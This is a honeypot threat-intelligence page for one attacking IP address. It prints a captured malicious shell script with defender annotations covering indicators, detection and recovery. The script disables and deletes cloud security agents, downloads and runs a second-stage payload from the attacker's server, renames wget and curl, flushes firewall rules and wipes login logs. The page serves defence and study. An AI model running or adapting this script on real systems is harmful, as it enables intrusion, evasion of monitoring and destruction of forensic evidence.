23.160.56.225
Location
🇺🇸 US / Salt Lake City
ASN
AS26042 · FiberState, LLC
Cloud Provider
—
Total Events
18
Average by volume
Agent Count
1
First / Last Seen
2026-04-09 11:35 — 2026-04-09 11:36
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
1 (1 with login)
Avg Depth Score
0.6
Commands Executed
1
Files Downloaded
0
Notable Commands
- #!/bin/sh; ; ;
# Review notes — defender annotation of a honeypot-captured script. The code is left exactly
# as captured; only comments are added. Rendering caveat: the feed collapsed the original
# newlines to "; ", so "then;", "do;", "{;" and "&;" are display artefacts, not valid sh,
# and the listing will not run as shown. Line breaks below are inserted only at ";" boundaries.
#
# Stage 1: choose a working directory. Takes the first candidate that is writable and in
# which a freshly created file tests executable; falls back to /tmp. Host artefact: a
# short-lived file named test_exec touched and removed in /dev/shm, /tmp, /var/tmp, /home
# or /root, immediately followed by the process changing cwd there.
wdir="/tmp"; for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do; touch "$i/test_exec" >/dev/null 2>&1; chmod +x "$i/test_exec" >/dev/null 2>&1; if [ -w "$i" ] && [ -x "$i/test_exec" ]; then; wdir="$i"; rm -f "$i/test_exec"; break; fi; rm -f "$i/test_exec" >/dev/null 2>&1; done; cd "$wdir" || exit 1; ; ;
# Stage 2: defence evasion. Stops, disables and masks the four named units, strips the
# immutable/append-only attributes under /usr/local/aegis and /usr/local/qcloud, kills the
# AliYunDun and YDService processes and deletes both trees. The unit names and paths look
# like cloud-provider host security agents (Alibaba/Tencent) — confirm against the fleet
# in scope. Detection: "systemctl mask" of these units, recursive "chattr -i -a" on these
# paths, and the agent's heartbeat stopping; all stderr/stdout is discarded, so nothing is
# logged by the script itself.
for svc in aegis aliyun YDService tat_agent; do; systemctl stop $svc >/dev/null 2>&1; systemctl disable $svc >/dev/null 2>&1; systemctl mask $svc >/dev/null 2>&1; done; systemctl daemon-reload >/dev/null 2>&1; ;
if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; pkill -9 AliYunDun >/dev/null 2>&1; pkill -9 YDService >/dev/null 2>&1; rm -rf /usr/local/aegis /usr/local/qcloud >/dev/null 2>&1; ; ;
# Stage 3: second-stage fetch. The URL is built from the same IP this page records
# (23.160.56.225) with the machine architecture from uname -m as a query parameter; the
# body is saved as new.txt in $wdir. Network IoC: an HTTP GET for /new.php?type=<arch> to
# that host. The page's session summary shows 0 files downloaded, so the honeypot did not
# obtain the payload.
download_vos() {; local_arch=$(uname -m); SERVER_IP="23.160.56.225" ; SERVER_URL="http://${SERVER_IP}/new.php?type=${local_arch}"; target="new.txt"; T_LIMIT=30; ; rm -f "$target" >/dev/null 2>&1; ; ;
# do_dl: fallback chain of downloaders, each accepted only if new.txt is non-empty (-s).
# Steps 3 and 4 (uncommented in the original) invoke binaries named "good" and "cool",
# which lock_tools below creates by renaming wget and curl, so a re-run on an already
# processed host still has a fetch path. A host with /usr/bin/good or /usr/bin/cool
# present, or with wget/curl missing, is a strong prior-compromise indicator.
do_dl() {; # 1. wget;
if command -v wget >/dev/null 2>&1; then; wget --no-check-certificate -q -T $T_LIMIT "$SERVER_URL" -O "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 2. curl;
if command -v curl >/dev/null 2>&1; then; curl -skL -m $T_LIMIT "$SERVER_URL" -o "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; ;
if command -v good >/dev/null 2>&1; then; good --no-check-certificate -q -T $T_LIMIT "$SERVER_URL" -O "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; ;
if command -v cool >/dev/null 2>&1; then; cool -skL -m $T_LIMIT "$SERVER_URL" -o "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 5. python3;
if command -v python3 >/dev/null 2>&1; then; python3 -c "import urllib.request; urllib.request.urlretrieve('$SERVER_URL', '$target')" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 6. 
# NOTE(review): the feed broke the comment "# 6. python" across two lines; the bare word
# at the start of the next line is comment text from the original, not a command.
python; if command -v python >/dev/null 2>&1; then; python -c "import urllib; urllib.urlretrieve('$SERVER_URL', '$target')" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; return 1; }; ; ;
# Watchdog: do_dl runs in the background and is polled once a second; after T_LIMIT (30)
# seconds it is hard-killed whether or not it finished. If new.txt is non-empty it is made
# executable and launched detached via setsid; if no process matching the name is visible
# one second later, it is re-launched as "sh ./new.txt" (i.e. the payload may be a script
# rather than a binary). Process IoC: a setsid'd child of sh in $wdir with argv ./new.txt
# or sh ./new.txt.
do_dl &; dl_pid=$!; sec=0; while [ $sec -lt $T_LIMIT ]; do; if ! kill -0 $dl_pid 2>/dev/null; then; wait $dl_pid; break; fi; sleep 1; sec=$((sec + 1)); done; kill -9 $dl_pid >/dev/null 2>&1; ; ;
if [ -s "$target" ]; then; chmod +x "$target"; setsid "./$target" >/dev/null 2>&1 &; sleep 1; if ! pgrep -f "$target" >/dev/null; then; setsid sh "./$target" >/dev/null 2>&1 &; fi; return 0; fi; return 1; }; ;
download_vos; ; ;
# lock_tools: after the fetch, clears the immutable bit on /usr/bin/wget and /usr/bin/curl
# and renames whichever wget/curl "which" resolves to into "good" and "cool" in the same
# directory (skipped if already renamed). Presumably meant to deny the stock fetch tools
# to anyone else on the host while keeping them usable through the script's own steps
# 3/4 — confirm from the payload. Recovery: reinstall the packages owning wget and curl;
# file-integrity monitoring on /usr/bin catches the rename, and ordinary admin tooling
# breaking is often the first symptom.
lock_tools() {; if command -v chattr >/dev/null 2>&1; then; chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; fi; w_path=$(which wget 2>/dev/null); [ -n "$w_path" ] && [ "$(basename "$w_path")" != "good" ] && mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1; c_path=$(which curl 2>/dev/null); [ -n "$c_path" ] && [ "$(basename "$c_path")" != "cool" ] && mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1; }; lock_tools; ; ;
# Stage 4: firewall down and anti-forensics. firewalld/ufw are stopped and every iptables
# rule in the filter table is flushed; wtmp, btmp and lastlog are overwritten with "echo >",
# which leaves each as a single newline — a 1-byte login history is itself an indicator
# and means last/lastb are unreliable for this host (use auth logs, journald or off-host
# forwarding instead). The closing "ls -la /var/run/gcc.pid" looks like a check for a
# marker left by the stage-3 payload; that cannot be confirmed from this script alone.
systemctl stop firewalld ufw >/dev/null 2>&1; iptables -F >/dev/null 2>&1; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog; do [ -f "$log" ] && echo > "$log"; done; ; sleep 2; ls -la /var/run/gcc.pid
Fingerprints
HASSH
SSH Client
Evidence Timeline
Reconnaissance
1c4fdc27aa56
LOGIN
1
1
60%